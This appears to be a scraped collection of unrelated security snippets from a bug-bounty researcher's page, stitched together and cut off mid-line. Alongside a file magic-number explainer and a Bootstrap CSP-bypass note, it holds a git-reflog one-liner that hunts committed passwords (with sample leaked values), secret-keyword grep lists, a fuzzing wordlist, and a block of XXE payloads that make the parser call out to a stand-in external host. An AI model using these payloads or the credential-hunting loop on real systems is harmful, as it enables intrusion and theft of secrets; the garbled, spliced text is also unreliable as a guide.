Jann Moon scumdestroy

File Magic Numbers

Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.

For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G ffd8 shows that it's a JPEG file, and ffe0 identify a JFIF type structure. There is an ascii encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.

This gives an ongoing list of file-type magic numbers.

Image Files

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)


	.
	..
	........
	@
	*
	.
	..*
	ðŸŽ

	#!/bin/bash

	echo "*** Running..."

	keywords=(
	"password"
	"key"
	"passwd"
	"secret"
	)

	0
	00
	01
	02
	03
	1
	1.0
	10
	100
	1000

	res=$(curl "https://zgheb.com" -i -sS -w "\r\n%{http_code}")

	responseCode=$(echo "$res" \| tail -1)
	headersAndBody=$(echo "$res" \| head -n -1)
	headers=$(echo "$headersAndBody" \| awk '{if($0=="\r")exit;print}')
	body=$(echo "$headersAndBody" \| awk '{if(body)print;if($0=="\r")body=1}')

	powered=$(echo "$res" \| grep -Fi "X-Powered-By" \| cut -d ":" -f2 \| awk '{$1=$1};1')

	echo "Response Code:"

	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

	#!/bin/bash
	# v78
	# unk9vvn@avi:~$ sudo chmod +x Unk9_Kali.sh;sudo ./Unk9_Kali.sh



	RED='\e[1;31m%s\e[0m\n'
	GREEN='\e[1;32m%s\e[0m\n'
	YELLOW='\e[1;33m%s\e[0m\n'
	BLUE='\e[1;34m%s\e[0m\n'